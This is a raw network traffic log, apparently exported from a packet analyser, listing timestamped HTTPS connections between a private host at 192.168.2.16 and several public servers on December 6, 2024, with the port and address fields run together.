                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.131911039 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.131927967 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.131983995 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.131989002 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.132030010 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.139352083 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.139369011 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.139426947 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.139431000 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.139475107 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.146780968 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.146797895 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.146852970 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.146866083 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.146950960 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.156754017 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.156780005 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.156821966 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.156836033 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.156872034 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.156889915 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.289361954 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.291764021 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.291788101 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.291837931 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.291853905 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.291981936 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.299041986 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.299060106 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.299124002 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.299134970 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.299190044 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.306989908 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.307007074 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.307064056 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.307070971 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.307110071 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.313672066 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.313688040 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.313744068 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.313755989 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.313787937 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.313944101 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.321490049 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.321508884 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.321563005 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.321571112 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.321607113 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.328757048 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.328775883 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.328823090 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.328834057 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.328875065 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.328892946 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.336575985 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.336594105 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.336647987 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.336654902 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.336688995 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.336708069 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.344458103 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.344487906 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.344532967 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.344537973 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.344578981 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.426899910 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.426942110 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.427026033 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.428221941 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.428234100 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.555048943 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.555062056 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.555097103 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.555130005 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.555140018 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.555191994 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.555191994 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.562849998 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.562870979 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.562963009 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.562988997 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.563097000 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.570112944 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.570135117 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.570240021 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.570240021 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.570274115 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.570447922 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.577969074 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.577996969 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.578120947 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.578146935 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.578257084 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.586199045 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.586219072 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.586363077 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.586376905 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.586443901 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.590162992 CET4434972023.218.208.109192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.590208054 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.590384960 CET49720443192.168.2.1623.218.208.109
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.593389988 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.593425035 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.593539953 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.593558073 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.593677998 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.597716093 CET49720443192.168.2.1623.218.208.109
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.597748995 CET4434972023.218.208.109192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.598007917 CET4434972023.218.208.109192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.602097034 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.602114916 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.602233887 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.602233887 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.602243900 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.602622986 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.609545946 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.609565020 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.609673023 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.609673023 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.609683990 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.609852076 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.645689964 CET49723443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.645739079 CET44349723151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.645874023 CET49723443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.648005009 CET49723443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.648005009 CET49714443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.648030996 CET44349723151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.653953075 CET49720443192.168.2.1623.218.208.109
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.667148113 CET49720443192.168.2.1623.218.208.109
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.679980993 CET49724443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.680028915 CET44349724151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.680252075 CET49724443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.680398941 CET49724443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.680413008 CET44349724151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.695339918 CET44349714151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.711333990 CET4434972023.218.208.109192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.721978903 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.747775078 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.747797966 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.747929096 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.747948885 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.748001099 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.756122112 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.756149054 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.756263018 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.756263018 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.756270885 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.756422043 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.763887882 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.763909101 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.763927937 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.763941050 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.763951063 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.763998985 CET49718443192.168.2.1618.165.220.127
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.764013052 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.764045954 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.764077902 CET49718443192.168.2.1618.165.220.127
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.764077902 CET49718443192.168.2.1618.165.220.127
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.765074968 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.765091896 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.765181065 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.765187979 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.765614986 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.772588015 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.772603989 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.772706985 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.772712946 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.772788048 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.779927015 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.779943943 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.780050039 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.780056000 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.780309916 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.788625002 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.788641930 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.788755894 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.788762093 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.788918972 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.796068907 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.796086073 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.796189070 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.796189070 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.796196938 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.796272039 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.802300930 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.802329063 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.802440882 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.802440882 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.802448034 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.802558899 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.803456068 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.803570032 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.804317951 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.804323912 CET44349710151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.804357052 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.804415941 CET49710443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.812896967 CET49718443192.168.2.1618.165.220.127
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.816297054 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.816328049 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.816658974 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.816714048 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.816761017 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.816847086 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.816936970 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.816957951 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.817174911 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.817188978 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.954058886 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.954077005 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.954117060 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.954133987 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.954144955 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.954155922 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.954277992 CET49718443192.168.2.1618.165.220.127
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.954278946 CET49718443192.168.2.1618.165.220.127
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.969453096 CET44349714151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.970432043 CET44349714151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.970654011 CET49714443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.970674038 CET44349714151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.971609116 CET44349714151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.971697092 CET44349714151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.971724987 CET49714443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.971796036 CET49714443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.983515024 CET49714443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.983540058 CET44349714151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.006266117 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.006280899 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.006309986 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.006334066 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.006423950 CET49718443192.168.2.1618.165.220.127
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.006433964 CET4434971818.165.220.127192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.006586075 CET49718443192.168.2.1618.165.220.127
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.006586075 CET49718443192.168.2.1618.165.220.127
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.104470968 CET4434972023.218.208.109192.168.2.16
